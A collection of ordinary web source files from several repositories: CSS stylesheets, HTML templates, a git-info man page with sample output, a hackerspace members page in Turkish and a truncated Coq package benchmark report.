background: #ededed;
display: block;
}
.mega-filter-pro .btn-group .btn {
opacity: 0.5;
}
.mega-filter-pro .btn-group .btn.active,
.mega-filter-pro .btn-group .btn.enable {
opacity: 1;
}
.mega-filter-pro .v-align-middle {
vertical-align: middle;
}
.mega-filter-pro .table-tbody tr:first-child td {
border-top: none;
}
.mega-filter-pro span.help {
display: block;
font-size: 11px;
}
.mega-filter-pro .scrollbox {
width: 300px;
height: 150px;
overflow-y: auto;
border: 1px solid #ccc;
}
.mega-filter-pro .scrollbox > div {
padding: 3px 3px 3px 7px;
}
.mega-filter-pro .scrollbox > div.odd {
background: #f0f0f0;
}
.mega-filter-pro a[onclick] {
cursor: pointer;
}
#column-left + #content {
position: relative;
}
#modal-image .modal-dialog {
z-index: 2000;
}
|
frappe/public/css/form.css
|
bohlian/frappe
|
.form-print-wrapper {
border: 1px solid #d1d8dd;
border-top: none;
}
.print-preview-wrapper {
padding: 30px 0px;
background-color: #f5f7fa;
}
.print-toolbar {
margin: 0px;
padding: 10px 0px;
border-bottom: 1px solid #d1d8dd;
}
.print-toolbar > div {
padding-right: 0px;
}
.print-toolbar > div:last-child {
padding-right: 15px;
}
.form-inner-toolbar {
padding: 10px 15px 0px;
background-color: #fafbfc;
text-align: right;
}
.form-inner-toolbar .btn {
margin-bottom: 10px;
}
.form-clickable-section {
border-top: 1px solid #d1d8dd;
padding: 10px 15px;
background-color: #F7FAFC;
}
.form-page.second-page {
border-top: 1px solid #d1d8dd;
}
.form-message {
padding: 15px 30px;
border-bottom: 1px solid #d1d8dd;
}
.document-flow-wrapper {
padding: 40px 15px 30px;
font-size: 12px;
border-bottom: 1px solid #EBEFF2;
}
.document-flow-wrapper .document-flow {
display: inline-block;
position: relative;
left: 50%;
transform: translateX(-50%);
}
.document-flow-wrapper .document-flow .document-flow-link-wrapper {
width: 140px;
display: inline-block;
}
.document-flow-wrapper .document-flow .document-flow-link-wrapper:not(:last-child) {
border-top: 1px solid #b8c2cc;
margin-right: -4px;
}
.document-flow-wrapper .document-flow .document-flow-link-wrapper:last-child {
margin-right: -140px;
}
.document-flow-wrapper .document-flow .document-flow-link {
margin-top: -10px;
display: inline-block;
}
.document-flow-wrapper .document-flow .document-flow-link:not(.disabled):hover .document-flow-link-label,
.document-flow-wrapper .document-flow .document-flow-link:not(.disabled):focus .document-flow-link-label,
.document-flow-wrapper .document-flow .document-flow-link:not(.disabled):active .document-flow-link-label {
text-decoration: underline;
}
.document-flow-wrapper .document-flow .document-flow-link-label {
display: inline-block;
margin-left: -50%;
margin-top: 5px;
}
@media (max-width: 767px) {
.document-flow-wrapper {
display: none;
}
}
.form-dashboard {
background-color: #fafbfc;
}
.form-dashboard-wrapper {
margin: -15px 0px;
}
.form-documents h6 {
margin-top: 15px;
}
.form-dashboard-section {
margin: 0px -15px;
padding: 15px 30px;
border-bottom: 1px solid #EBEFF2;
}
.form-dashboard-section:first-child {
padding-top: 0px;
}
.form-dashboard-section:last-child {
border-bottom: none;
}
.form-heatmap .heatmap {
display: flex;
justify-content: center;
}
.form-heatmap .heatmap-message {
margin-top: 10px;
}
@media (max-width: 991px) {
.form-heatmap {
overflow: hidden;
overflow-x: scroll;
}
}
.inline-graph .inline-graph-half {
width: 48%;
display: inline-block;
position: relative;
height: 30px;
}
.inline-graph .inline-graph-half .inline-graph-count {
font-size: 10px;
position: absolute;
left: 0;
right: 0;
top: 3px;
padding: 0px 5px;
text-align: left;
}
.inline-graph .inline-graph-half .inline-graph-bar {
position: absolute;
left: 0;
right: 0;
top: 20px;
}
.inline-graph .inline-graph-half .inline-graph-bar-inner {
display: block;
float: left;
background-color: #d1d8dd;
height: 6px;
border-radius: 0px 3px 3px 0px;
}
.inline-graph .inline-graph-half .inline-graph-bar-inner.dark {
background-color: #36414C;
}
.inline-graph .inline-graph-half:first-child {
border-right: 1px solid #d1d8dd;
margin-right: -3px;
}
.inline-graph .inline-graph-half:first-child .inline-graph-count {
text-align: right;
}
.inline-graph .inline-graph-half:first-child .inline-graph-bar-inner {
float: right;
border-radius: 3px 0px 0px 3px;
}
.progress-area {
padding-top: 15px;
padding-bottom: 15px;
}
.form-links .document-link {
margin-bottom: 10px;
height: 22px;
}
.form-links .document-link:hover .badge-link {
text-decoration: underline;
}
.form-links .document-link:hover .badge-link[disabled='disabled'] {
text-decoration: none;
}
.form-links .count {
display: inline-block;
margin-left: 5px;
margin-right: 5px;
}
h6.uppercase,
.h6.uppercase {
font-size: 11px;
font-weight: normal;
letter-spacing: 0.4px;
text-transform: uppercase;
color: #8D99A6;
}
.form-section {
margin: 0px;
padding: 15px;
}
.form-section .form-section-description {
margin-bottom: 10px;
}
.form-section .form-section-heading {
margin: 10px 0px;
}
.form-section .section-head {
margin: 0px 0px 15px 15px;
cursor: pointer;
}
.form-section .section-head .collapse-indicator {
color: #d1d8dd;
margin-left: 10px;
position: relative;
bottom: -1px;
}
.form-section .section-head .collapse-indicator.octicon-chevron-up {
bottom: -2px;
}
.form-section .section-head.collapsed {
margin-bottom: 0px;
}
.form-section:not(:last-child),
.form-inner-toolbar {
border-bottom: 1px solid #d1d8dd;
}
.empty-section {
display: none !important;
}
.modal .form-layout {
margin: -15px;
}
.modal .form-grid .form-layout {
margin: 0px;
}
.modal .form-section {
padding: 15px 7px;
}
.help ol {
padding-left: 19px;
}
.field_description_top {
margin-bottom: 3px;
}
.user-actions {
margin-bottom: 15px;
}
.user-actions a {
font-weight: bold;
}
.badge-important {
background-color: #e74c3c;
}
.address-box {
background-color: #fafbfc;
padding: 0px 15px;
margin: 15px 0px;
border: 1px solid #d1d8dd;
border-radius: 3px;
font-size: 12px;
}
.timeline {
margin: 30px 0px;
}
.timeline .timeline-head .comment-input {
height: auto;
}
.timeline-item {
margin-top: 0px;
}
.timeline-item b {
color: #36414C !important;
}
.timeline-item blockquote {
font-size: inherit;
}
.timeline-item .btn-more {
margin-left: 65px;
}
.timeline-item .gmail_extra {
display: none;
}
.timeline-items {
position: relative;
}
.timeline {
position: relative;
}
.timeline::before {
content: " ";
border-left: 1px solid #d1d8dd;
position: absolute;
top: 0px;
bottom: -124px;
left: 43px;
z-index: 0;
}
.timeline.in-dialog::before {
bottom: 0px;
}
@media (max-width: 991px) {
.timeline::before {
bottom: -64px;
}
}
.timeline-item.user-content {
margin: 30px 0px 30px 27px;
}
.timeline-item.user-content .media-body {
border: 1px solid #d1d8dd;
border-radius: 3px;
margin-left: -7px;
position: relative;
max-width: calc(100% - 50px);
padding-right: 0px;
overflow: visible;
}
.timeline-item.user-content .avatar-medium {
margin-right: 10px;
height: 45px;
width: 45px;
}
.timeline-item.user-content .action-btns {
position: absolute;
right: 0;
padding: 8px 15px 0 5px;
}
.timeline-item.user-content .action-btns .edit-btn-container {
margin-right: 13px;
}
.timeline-item.user-content .comment-header {
background-color: #fafbfc;
padding: 10px 15px 8px 13px;
margin: 0px;
color: #8D99A6;
border-bottom: 1px solid #EBEFF2;
}
.timeline-item.user-content .comment-header.links-active {
padding-right: 77px;
}
.timeline-item.user-content .comment-header .asset-details {
display: inline-block;
width: 100%;
}
.timeline-item.user-content .comment-header .asset-details .btn-link {
border: 0;
border-radius: 0;
padding: 0;
}
.timeline-item.user-content .comment-header .asset-details .btn-link:hover {
text-decoration: none;
}
.timeline-item.user-content .comment-header .commented-on-small {
display: none;
}
.timeline-item.user-content .comment-header .octicon-heart {
color: #ff5858;
cursor: pointer;
}
.timeline-item.user-content .reply {
padding: 15px;
overflow: auto;
}
.timeline-item.user-content .reply > div > p:first-child {
margin-top: 0px;
}
.timeline-item.user-content .reply > div > p:last-child {
margin-bottom: 0px;
}
.timeline-item.user-content .reply hr {
margin: 10px 0px;
}
.timeline-item.user-content .close-btn-container .close {
color: inherit;
opacity: 1;
padding: 0;
font-size: 18px;
}
.timeline-item.user-content .edit-btn-container {
padding: 0;
}
.timeline-item.user-content .edit-btn-container .edit {
color: inherit;
font-size: 21px;
line-height: 1;
}
.timeline-item.user-content .edit-btn-container .edit .octicon-check {
font-size: 1em;
}
.timeline-item.user-content .edit-btn-container .edit:hover,
.timeline-item.user-content .edit-btn-container .edit:focus {
color: #000;
}
.timeline-item.user-content .comment-likes {
margin-left: 5px;
}
.timeline-item.user-content .media-body:after,
.timeline-item.user-content .media-body:before {
right: 100%;
top: 15px;
border: solid transparent;
content: " ";
height: 0;
width: 0;
position: absolute;
pointer-events: none;
}
.timeline-item.user-content .media-body:after {
border-color: rgba(136, 183, 213, 0);
border-right-color: #fafbfc;
border-width: 6px;
margin-top: -6px;
}
.timeline-item.user-content .media-body:before {
border-color: rgba(194, 225, 245, 0);
border-right-color: #d1d8dd;
border-width: 7px;
margin-top: -7px;
}
.timeline-item.notification-content {
padding-left: 30px;
margin: 30px 0px;
position: relative;
color: #8D99A6;
}
.timeline-item.notification-content * {
color: #8D99A6;
}
.timeline-item.notification-content .fa-fw {
margin-left: 36px;
}
.timeline-item.notification-content div.small {
padding-left: 40px;
}
.timeline-item.notification-content div.small .fa-fw {
margin-left: 0px;
}
.timeline-item.notification-content .octicon-heart {
color: #ff5858 !important;
}
.timeline-item.notification-content::before {
content: " ";
width: 7px;
height: 7px;
background-color: #d1d8dd;
position: absolute;
left: 40px;
border-radius: 50%;
top: 5px;
}
.timeline-item .reply-link {
margin-left: 15px;
font-size: 12px;
}
.timeline-head {
background-color: white;
border: 1px solid #d1d8dd;
border-radius: 3px;
position: relative;
z-index: 1;
}
.timeline-head .comment-input-header {
background-color: #fafbfc;
padding: 7px 15px;
border-bottom: 1px solid #EBEFF2;
}
.timeline-head .comment-input-container {
padding: 15px;
}
.timeline-head .comment-input-container .awesomplete > ul {
min-width: 200px;
}
.timeline-head .comment-input {
border-color: #EBEFF2;
max-width: 100%;
}
.timeline-head .comment-input:focus {
box-shadow: none;
}
@media (max-width: 767px) {
.timeline-head {
border-left: none;
border-right: none;
border-radius: 0px;
}
}
.signature-field {
min-height: 300px;
background: #fff;
border: 1px solid #d1d8dd;
border-radius: 3px;
position: relative;
margin-top: -10px;
}
.signature-display {
margin: 7px 0px;
background: #fff;
}
.signature-btn-row {
position: absolute;
bottom: 12px;
right: 12px;
}
.signature-reset {
z-index: 10;
height: 30px;
width: 30px;
padding: 4px 0px;
}
.signature-img {
background: #fff;
border-radius: 3px;
margin-top: 5px;
max-height: 150px;
}
.timeline-new-email {
margin: 30px 0px;
padding-left: 70px;
position: relative;
}
.timeline-new-email::before {
content: " ";
width: 7px;
height: 7px;
background-color: #d1d8dd;
position: absolute;
left: 40px;
border-radius: 50%;
top: 5px;
}
.form-footer h5 {
margin: 15px 0px;
font-weight: bold;
}
.control-label,
.grid-heading-row {
color: #8D99A6;
font-size: 12px;
}
.control-label {
margin-bottom: 5px;
font-weight: normal;
}
.like-disabled-input {
margin-bottom: 7px;
min-height: 30px;
font-weight: bold;
background-color: #f5f7fa;
padding: 5px 10px;
border-radius: 3px;
}
.disabled-check {
color: #f5f7fa;
margin-right: 3px;
margin-bottom: -2px;
}
.like-disabled-input.for-description {
font-weight: normal;
font-size: 12px;
}
.frappe-control {
margin-bottom: 10px;
}
.frappe-control .help-box {
margin-top: 3px;
}
.frappe-control pre {
white-space: pre-wrap;
background-color: inherit;
border: none;
padding: 0px;
margin: 0px;
}
.flex-justify-center {
display: flex;
justify-content: center;
}
.flex-justify-end {
display: flex;
justify-content: flex-end;
}
.hide-control {
display: none !important;
}
.shared-user {
margin-bottom: 10px;
}
.attach-missing-image,
.attach-image-display {
cursor: pointer;
}
select.form-control {
-webkit-appearance: none;
-moz-appearance: none;
appearance: none;
}
.form-control.bold {
color: #000;
font-weight: bold;
background-color: #fffdf4;
}
.form-control[data-fieldtype="Password"] {
position: inherit;
}
.password-strength-indicator {
float: right;
padding: 15px;
margin-top: -41px;
margin-right: -7px;
}
.password-strength-message {
margin-top: -10px;
}
.control-code,
.control-code.bold {
height: 400px;
font-family: Monaco, "Courier New", monospace;
color: #36414C;
font-size: 12px;
line-height: 1.7em;
}
.delivery-status-indicator {
display: inline-block;
margin-top: -3px;
margin-left: 1px;
font-weight: 500;
color: #8D99A6;
}
@media (min-width: 768px) {
.layout-main .form-column.col-sm-12 > form > .input-max-width {
max-width: 50%;
padding-right: 15px;
}
.col-sm-6 .form-grid .form-column.col-sm-12 > form > .input-max-width {
max-width: none;
padding-right: 0px;
}
.form-column.col-sm-6 textarea[data-fieldtype="Code"] {
height: 120px !important;
}
}
@media (max-width: 991px) {
.form-section .form-section-heading {
margin-top: 10px;
}
}
@media (max-width: 767px) {
.form-section .section-head {
padding: 15px 15px 15px 0px;
}
.form-section .section-body .form-column:first-child .radio,
.form-section .section-body .form-column:first-child .checkbox {
margin-top: 0;
}
.form-column {
border-bottom: 1px solid #EBEFF2;
padding-top: 15px;
padding-bottom: 15px;
}
.form-column:last-child {
border-bottom: 0px;
}
.form-section {
padding-left: 0px !important;
padding-right: 0px !important;
}
.form-grid {
margin-left: -17px;
margin-right: -17px;
border-left: none !important;
border-right: none !important;
border-radius: none;
}
.form-page .form-section {
padding: 0px 15px;
}
.frappe-control.form-page {
padding: 7px 15px;
border-bottom: 1px solid #EBEFF2;
margin: 0px -15px;
}
.frappe-control.form-page .link-btn {
top: -2px;
}
.frappe-control.form-page .like-disabled-input {
min-height: 0px !important;
}
.frappe-control.form-page:last-child {
margin-bottom: 0px;
}
.form-page .frappe-control:last-child {
border-bottom: 0px;
}
.form-page .frappe-control[data-fieldtype="Table"] {
padding: 0px 15px;
margin-top: -1px;
border-bottom: none;
}
.form-page .frappe-control[data-fieldtype="Table"] label {
margin-top: 7px;
}
.form-page .form-control {
border: none;
border-bottom: 1px solid #d1d8dd;
box-shadow: none;
background-color: inherit;
height: auto;
padding: 0px;
margin-bottom: 7px;
border-radius: 0px;
text-align: left !important;
}
.form-page .form-control:focus {
box-shadow: none;
}
}
/* goals */
.goals-page-container {
background-color: #fafbfc;
padding-top: 1px;
}
.goals-page-container .goal-container {
background-color: #fff;
box-shadow: 0 1px 3px rgba(0, 0, 0, 0.3);
border-radius: 2px;
padding: 10px;
margin: 10px;
}
body[data-route^="Form/Communication"] textarea[data-fieldname="subject"] {
height: 80px !important;
}
|
TAIHAO2019/pub/SmallGame/AsFastAsYouCan2/d896721fbd199c398119e8c7debda85dd92ef4028cca39910bf871cc20437bed.html
|
simonmysun/praxis
|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>18 --> 19</title>
<link href="./../../assets/style.css" rel="stylesheet">
</head>
<body>
<h2>You have to be fast</h2>
<a href="./24c188a3ed61aa92dd0a2a0e996c87cc63425eb89226c986d9fa89aacee64d42.html">Teleport</a>
<hr>
<a href="./../../about.md">About</a> (Spoilers! )
<script src="./../../assets/md5.js"></script>
<script>
window.currentLevel = 7;
</script>
<script src="./../../assets/script.js"></script>
</body>
</html>
|
components/dgui-keyboard/dgui-keyboard.css
|
dGUIJS/dGUI
|
:host
{
position: relative;
font-size: 10px;
-webkit-user-select: none;
-moz-user-select: none;
user-select: none;
}
.Keyboard
{
position: absolute;
top: 10px;
left: 20px;
margin: 0;
padding: 0;
overflow: hidden;
display: inline-block;
background: linear-gradient(to bottom, #deefff 0%,#98bede 100%);
border-radius: 10px;
padding: 5px;
z-index: 99999;
white-space: pre;
}
.Keyboard-elem
{
list-style: none;
display: inline-block;
font-size: 16px;
}
.Keyboard-elem--smallMargin
{
margin-left: 2em;
}
.Keyboard-elem--bigMargin
{
margin-left: 3em;
}
/**
* KEYS.css
*
* A simple stylesheet for rendering beautiful keyboard-style elements.
*
* Author: Michael Hüneburg
* Website: http://michaelhue.com/keyscss
* License: MIT License (see LICENSE.txt)
*/
/* Base style, essential for every key. */
.Keyboard-key
{
margin-bottom: .5em;
margin-right: .5em;
display: inline-block;
min-width: 2em;
padding: 1em;
font: normal .85em/1 "Lucida Grande", Lucida, Arial, sans-serif;
text-align: center;
text-decoration: none;
border-radius: .3em;
border: none;
cursor: pointer;
-moz-user-select: none;
-webkit-user-select: none;
user-select: none;
background: linear-gradient(to bottom, #fff 0%, #d2d2d2 100%);
color: rgb(50, 50, 50);
text-shadow: 0 0 2px rgb(255, 255, 255);
box-shadow: inset 0 0 1px rgb(255, 255, 255), inset 0 0 .4em rgb(200, 200, 200), 0 .1em 0 rgb(130, 130, 130), 0 .11em 0 rgba(0, 0, 0, .4), 0 .1em .11em rgba(0, 0, 0, .9);
}
.Keyboard-key--space
{
width: 35em;
}
.Keyboard-key:active, .Keyboard-key--pressed
{
background: linear-gradient(to bottom, #d2d2d2 0%,#ffffff 100%);
box-shadow: inset 0 0 1px #000, inset 0 0 .4em #ccc, 0 .1em 0 #ccc, 0 .11em 0 #ccc, 0 .1em .11em #ccc;
}
|
man/git-info.html
|
brianloveswords/git-extras
|
<!DOCTYPE html>
<html>
<head>
<meta http-equiv='content-type' value='text/html;charset=utf8'>
<meta name='generator' value='Ronn/v0.7.3 (http://github.com/rtomayko/ronn/tree/0.7.3)'>
<title>git-info(1) - Returns information on current respository</title>
<style type='text/css' media='all'>
/* style: man */
body#manpage {margin:0}
.mp {max-width:100ex;padding:0 9ex 1ex 4ex}
.mp p,.mp pre,.mp ul,.mp ol,.mp dl {margin:0 0 20px 0}
.mp h2 {margin:10px 0 0 0}
.mp > p,.mp > pre,.mp > ul,.mp > ol,.mp > dl {margin-left:8ex}
.mp h3 {margin:0 0 0 4ex}
.mp dt {margin:0;clear:left}
.mp dt.flush {float:left;width:8ex}
.mp dd {margin:0 0 0 9ex}
.mp h1,.mp h2,.mp h3,.mp h4 {clear:left}
.mp pre {margin-bottom:20px}
.mp pre+h2,.mp pre+h3 {margin-top:22px}
.mp h2+pre,.mp h3+pre {margin-top:5px}
.mp img {display:block;margin:auto}
.mp h1.man-title {display:none}
.mp,.mp code,.mp pre,.mp tt,.mp kbd,.mp samp,.mp h3,.mp h4 {font-family:monospace;font-size:14px;line-height:1.42857142857143}
.mp h2 {font-size:16px;line-height:1.25}
.mp h1 {font-size:20px;line-height:2}
.mp {text-align:justify;background:#fff}
.mp,.mp code,.mp pre,.mp pre code,.mp tt,.mp kbd,.mp samp {color:#131211}
.mp h1,.mp h2,.mp h3,.mp h4 {color:#030201}
.mp u {text-decoration:underline}
.mp code,.mp strong,.mp b {font-weight:bold;color:#131211}
.mp em,.mp var {font-style:italic;color:#232221;text-decoration:none}
.mp a,.mp a:link,.mp a:hover,.mp a code,.mp a pre,.mp a tt,.mp a kbd,.mp a samp {color:#0000ff}
.mp b.man-ref {font-weight:normal;color:#434241}
.mp pre {padding:0 4ex}
.mp pre code {font-weight:normal;color:#434241}
.mp h2+pre,h3+pre {padding-left:0}
ol.man-decor,ol.man-decor li {margin:3px 0 10px 0;padding:0;float:left;width:33%;list-style-type:none;text-transform:uppercase;color:#999;letter-spacing:1px}
ol.man-decor {width:100%}
ol.man-decor li.tl {text-align:left}
ol.man-decor li.tc {text-align:center;letter-spacing:4px}
ol.man-decor li.tr {text-align:right;float:right}
</style>
</head>
<!--
The following styles are deprecated and will be removed at some point:
div#man, div#man ol.man, div#man ol.head, div#man ol.man.
The .man-page, .man-decor, .man-head, .man-foot, .man-title, and
.man-navigation should be used instead.
-->
<body id='manpage'>
<div class='mp' id='man'>
<div class='man-navigation' style='display:none'>
<a href="#NAME">NAME</a>
<a href="#SYNOPSIS">SYNOPSIS</a>
<a href="#DESCRIPTION">DESCRIPTION</a>
<a href="#OPTIONS">OPTIONS</a>
<a href="#EXAMPLES">EXAMPLES</a>
<a href="#AUTHOR">AUTHOR</a>
<a href="#REPORTING-BUGS">REPORTING BUGS</a>
<a href="#SEE-ALSO">SEE ALSO</a>
</div>
<ol class='man-decor man-head man head'>
<li class='tl'>git-info(1)</li>
<li class='tc'></li>
<li class='tr'>git-info(1)</li>
</ol>
<h2 id="NAME">NAME</h2>
<p class="man-name">
<code>git-info</code> - <span class="man-whatis">Returns information on current respository</span>
</p>
<h2 id="SYNOPSIS">SYNOPSIS</h2>
<p><code>git-info</code></p>
<h2 id="DESCRIPTION">DESCRIPTION</h2>
<p>Shows the following information about a repository:<br />
1. Remote Url(s)<br />
2. Remote Branches<br />
3. Local Branches<br />
4. Most recent commit<br />
5. Configuration Info</p>
<h2 id="OPTIONS">OPTIONS</h2>
<p>N/A</p>
<h2 id="EXAMPLES">EXAMPLES</h2>
<p>Outputs info about a repo:</p>
<pre><code>$ git info
## Remote URLs:
origin git@github.com:sampleAuthor/git-extras.git (fetch)
origin git@github.com:sampleAuthor/git-extras.git (push)
## Remote Branches:
origin/HEAD -> origin/master
origin/myBranch
## Local Branches:
myBranch
* master
## Most Recent Commit:
commit e3952df2c172c6f3eb533d8d0b1a6c77250769a7
Author: Sample Author <sampleAuthor@gmail.com>
Added git-info command.
Type 'git log' for more commits, or 'git show <commit id>' for full commit details.
## Configuration (.git/config):
color.diff=auto
color.status=auto
color.branch=auto
user.name=Sample Author
user.email=sampleAuthor@gmail.com
core.repositoryformatversion=0
core.filemode=true
core.bare=false
core.logallrefupdates=true
core.ignorecase=true
remote.origin.fetch=+refs/heads/*:refs/remotes/origin/*
remote.origin.url=git@github.com:mub/git-extras.git
branch.master.remote=origin
branch.master.merge=refs/heads/master
</code></pre>
<h2 id="AUTHOR">AUTHOR</h2>
<p>Written by Leila Muhtasib <<a data-bare-link="true" href="mailto:muhtasib@gmail.com">muhtasib@gmail.com</a>></p>
<h2 id="REPORTING-BUGS">REPORTING BUGS</h2>
<p><<a data-bare-link="true" href="http://github.com/visionmedia/git-extras/issues">http://github.com/visionmedia/git-extras/issues</a>></p>
<h2 id="SEE-ALSO">SEE ALSO</h2>
<p><<a data-bare-link="true" href="http://github.com/visionmedia/git-extras">http://github.com/visionmedia/git-extras</a>></p>
<ol class='man-decor man-foot man foot'>
<li class='tl'></li>
<li class='tc'>June 2012</li>
<li class='tr'>git-info(1)</li>
</ol>
</div>
</body>
</html>
|
assets/js/templates/snippet/phoneinput.html
|
denst/form_builder_bootstrap
|
<!-- Phone input-->
<p class="input-control">
<% if (label.length > 0) { %><label class="control-label" for="<%= id %>"><%= label %></label><% } %>
<input onfocus="if(this.value=='<%= placeholder %>')this.value='';" onblur="if(this.value=='')this.value='<%= placeholder %>';" name="<%= id %>" class="form-control <%= inputsize %><% if(required) {%> required <% } %>" value="" id="<%= id %>" type="text" placeholder="<%= placeholder %>">
<% if (helptext.length > 0) { %><p class="help-block"><%= helptext %></p><% } %>
<div class="input-error" style="display: none"></div>
</p>
|
src/members/templates/index.html
|
elifkus/Hackerhane
|
{% extends "base.html" %}
{% block content %}
<h3>Hackerspace Üye</h3>
<p>Hackerspace'in para işlerini takip etmek ve bütçeyi herkesin takip edebileceği bir hale getirmek için bu uygulamayı yaptım.</p>
<p>Giriş yapmanızı istedim çünkü üyelik bilgisini ve yaptığınız ödemeleri girdiğiniz kullanıcılara tanımlayacağım. Giriş yapmayanların da bizde kayıtlı eposta adreslerine kullanıcı yaratacağım. Şifre hatırlat özelliği ile şifrelerini alabilecekler. </p>
<p>Şu andaki özellikler:</p>
<ul>
<li>Login</li>
<li>Profil düzenleme / diğer üyelerin profilini görme</li>
</ul>
<p>Pek birşey yok yani.</p>
<p>İkinci aşamada şu özellikleri açacağım:</p>
<ul>
<li>Üyenin kendi ödediği aidatları görmesi</li>
<li>Mayıs ayından beri olan gelir ve gideri görebilme</li>
</ul>
<br/>
<p>Hata ve önerileriniz için <a href="https://github.com/elifkus/Hackerhane/issues">github issues</a>'u kullanabilirsiniz.</p>
<p class="text-right">Elif</p>
{% endblock content %}
|
clean/Linux-x86_64-4.09.1-2.0.6/released/8.10.0/coqeal/1.0.1.html
|
coq-bench/coq-bench.github.io
|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>coqeal: 9 m 21 s 🏆</title>
<link rel="shortcut icon" type="image/png" href="../../../../../favicon.png" />
<link href="../../../../../bootstrap.min.css" rel="stylesheet">
<link href="../../../../../bootstrap-custom.css" rel="stylesheet">
<link href="//maxcdn.bootstrapcdn.com/font-awesome/4.2.0/css/font-awesome.min.css" rel="stylesheet">
<script src="../../../../../moment.min.js"></script>
<!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
<!--[if lt IE 9]>
<script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
<script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
<![endif]-->
</head>
<body>
<div class="container">
<div class="navbar navbar-default" role="navigation">
<div class="container-fluid">
<div class="navbar-header">
<a class="navbar-brand" href="../../../../.."><i class="fa fa-lg fa-flag-checkered"></i> Coq bench</a>
</div>
<div id="navbar" class="collapse navbar-collapse">
<ul class="nav navbar-nav">
<li><a href="../..">clean / released</a></li>
<li class="active"><a href="">8.10.0 / coqeal - 1.0.1</a></li>
</ul>
</div>
</div>
</div>
<div class="article">
<div class="row">
<div class="col-md-12">
<a href="../..">« Up</a>
<h1>
coqeal
<small>
1.0.1
<span class="label label-success">9 m 21 s 🏆</span>
</small>
</h1>
<p>📅 <em><script>document.write(moment("2021-12-31 19:49:08 +0000", "YYYY-MM-DD HH:mm:ss Z").fromNow());</script> (2021-12-31 19:49:08 UTC)</em><p>
<h2>Context</h2>
<pre># Packages matching: installed
# Name # Installed # Synopsis
base-bigarray base
base-threads base
base-unix base
conf-findutils 1 Virtual package relying on findutils
coq 8.10.0 Formal proof management system
num 1.4 The legacy Num library for arbitrary-precision integer and rational arithmetic
ocaml 4.09.1 The OCaml compiler (virtual package)
ocaml-base-compiler 4.09.1 Official release 4.09.1
ocaml-config 1 OCaml Switch Configuration
ocamlfind 1.9.1 A library manager for OCaml
# opam file:
opam-version: "2.0"
maintainer: "Cyril Cohen <cyril.cohen@inria.fr>"
homepage: "https://github.com/coq-community/coqeal"
dev-repo: "git+https://github.com/coq-community/coqeal.git"
bug-reports: "https://github.com/coq-community/coqeal/issues"
license: "MIT"
synopsis: "CoqEAL - The Coq Effective Algebra Library"
description: """
This Coq library contains a subset of the work that was developed in the context
of the ForMath EU FP7 project (2009-2013). It has two parts:
- theory, which contains developments in algebra and optimized algorithms on mathcomp data structures.
- refinements, which is a framework to ease change of data representations during a proof."""
build: [make "-j%{jobs}%"]
install: [make "install"]
depends: [
"coq" {(>= "8.7" & < "8.12~")}
"coq-bignums" {(>= "8.7" & < "8.12~")}
"coq-paramcoq" {(>= "1.1.1")}
"coq-mathcomp-multinomials" {(>= "1.2" & < "1.4~")}
"coq-mathcomp-algebra" {(>= "1.8.0" & < "1.10~")}
]
tags: [
"category:Computer Science/Decision Procedures and Certified Algorithms/Correctness proofs of algorithms"
"keyword:effective algebra"
"keyword:elementary divisor rings"
"keyword:Smith normal form"
"keyword:mathematical components"
"keyword:Bareiss"
"keyword:Karatsuba multiplication"
"keyword:refinements"
"logpath:CoqEAL"
]
authors: [
"Guillaume Cano"
"Cyril Cohen"
"Maxime Dénès"
"Anders Mörtberg"
"Vincent Siles"
]
url {
src: "https://github.com/coq-community/coqeal/archive/refs/tags/1.0.1.tar.gz"
checksum: "sha512=e41a97f89aca2ac18cffdf5795e16b60b44eac4e46512e4f5779ce49e2edff6d66b5ab89dd21e9255ba2facde4925e2ddf5e6bd594aea4a427f0916711e09f75"
}
</pre>
<h2>Lint</h2>
<dl class="dl-horizontal">
<dt>Command</dt>
<dd><code>true</code></dd>
<dt>Return code</dt>
<dd>0</dd>
</dl>
<h2>Dry install 🏜️</h2>
<p>Dry install with the current Coq version:</p>
<dl class="dl-horizontal">
<dt>Command</dt>
<dd><code>opam install -y --show-action coq-coqeal.1.0.1 coq.8.10.0</code></dd>
<dt>Return code</dt>
<dd>0</dd>
</dl>
<p>Dry install without Coq/switch base, to test if the problem was incompatibility with the current Coq/OCaml version:</p>
<dl class="dl-horizontal">
<dt>Command</dt>
<dd><code>true</code></dd>
<dt>Return code</dt>
<dd>0</dd>
</dl>
<h2>Install dependencies</h2>
<dl class="dl-horizontal">
<dt>Command</dt>
<dd><code>opam list; echo; ulimit -Sv 4000000; timeout 4h opam install -y --deps-only coq-coqeal.1.0.1 coq.8.10.0</code></dd>
<dt>Return code</dt>
<dd>0</dd>
<dt>Duration</dt>
<dd>18 m 52 s</dd>
</dl>
<h2>Install 🚀</h2>
<dl class="dl-horizontal">
<dt>Command</dt>
<dd><code>opam list; echo; ulimit -Sv 16000000; timeout 4h opam install -y -v coq-coqeal.1.0.1 coq.8.10.0</code></dd>
<dt>Return code</dt>
<dd>0</dd>
<dt>Duration</dt>
<dd>9 m 21 s</dd>
</dl>
<h2>Installation size</h2>
<p>Total: 42 M</p>
<ul>
<li>13 M <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/refinements.vo</code></li>
<li>11 M <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/param.vo</code></li>
<li>2 M <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/hpoly.vo</code></li>
<li>1 M <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/multipoly.vo</code></li>
<li>854 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/seqmx.vo</code></li>
<li>633 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/bareiss_eff.vo</code></li>
<li>612 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/kaplansky.vo</code></li>
<li>595 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/dvdring.vo</code></li>
